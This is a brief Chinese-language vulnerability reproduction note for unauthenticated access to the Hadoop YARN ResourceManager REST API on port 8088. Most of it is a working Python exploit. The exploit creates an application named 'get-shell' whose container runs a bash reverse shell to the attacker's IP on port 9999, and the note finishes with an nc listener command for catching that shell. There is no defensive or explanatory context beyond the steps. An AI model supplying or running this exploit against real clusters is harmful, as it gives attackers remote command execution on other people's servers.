Hadoop YARN ResourceManager 未授权访问漏洞复现
http://ip:8088
验证ip http://ip:8088/ws/v1/cluster/apps/new-application

exp：
#!/usr/bin/env python

import requests

target = 'http://ip:8088/'
lhost = 'ip' # 攻击方的IP地址

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)


本地nc监听：nc -lvp 9999

执行python，反弹shell。
